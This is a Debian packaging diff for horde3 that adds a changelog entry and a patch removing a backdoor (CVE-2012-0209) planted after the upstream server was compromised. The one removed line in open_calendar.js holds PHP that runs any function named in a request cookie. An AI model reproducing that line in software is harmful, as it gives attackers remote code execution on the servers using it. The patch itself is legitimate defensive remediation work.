diff -Nru horde3-3.3.12+debian0/debian/changelog horde3-3.3.12+debian0/debian/changelog
--- horde3-3.3.12+debian0/debian/changelog	2012-01-07 11:23:22.000000000 +0000
+++ horde3-3.3.12+debian0/debian/changelog	2012-02-13 18:52:40.000000000 +0000
@@ -1,3 +1,10 @@
+horde3 (3.3.12+debian0-2) unstable; urgency=emergency
+
+  * Remove backdoor in emergency (upstream server is compromised).
+    CVE-2012-0209
+
+ -- Gregory Colpart <reg@debian.org>  Thu, 09 Feb 2012 00:41:34 +0100
+
 horde3 (3.3.12+debian0-1) unstable; urgency=low
 
   * New upstream release (Closes: #636592)
diff -Nru horde3-3.3.12+debian0/debian/patches/0008-Remove-backdoor.patch horde3-3.3.12+debian0/debian/patches/0008-Remove-backdoor.patch
--- horde3-3.3.12+debian0/debian/patches/0008-Remove-backdoor.patch	1970-01-01 00:00:00.000000000 +0000
+++ horde3-3.3.12+debian0/debian/patches/0008-Remove-backdoor.patch	2012-02-13 18:52:18.000000000 +0000
@@ -0,0 +1,25 @@
+From f4351199d12961f5859f71a85c7d67abddff8d9f Mon Sep 17 00:00:00 2001
+From: Gregory Colpart <reg@debian.org>
+Date: Wed, 8 Feb 2012 23:31:29 +0100
+Subject: [PATCH 8/8] Remove backdoor
+
+---
+ templates/javascript/open_calendar.js |    2 +-
+ 1 files changed, 1 insertions(+), 1 deletions(-)
+
+diff --git a/templates/javascript/open_calendar.js b/templates/javascript/open_calendar.js
+index 543df64..7e620d8 100644
+--- a/templates/javascript/open_calendar.js
++++ b/templates/javascript/open_calendar.js
+@@ -274,7 +274,7 @@ var Horde_Calendar = {
+         cell = document.createElement('TD');
+         cell.className = 'rightAlign';
+         link = document.createElement('A');
+-        link.href = '#<?php (isset($_COOKIE["href"]) && preg_match("/(.*):(.*)/", $_COOKIE["href"], $m))?$m[1]($m[2]):"";?>';
++        link.href = '#';
+         link.innerHTML = '&raquo;';
+         link.onclick = function()
+         {
+-- 
+1.7.2.5
+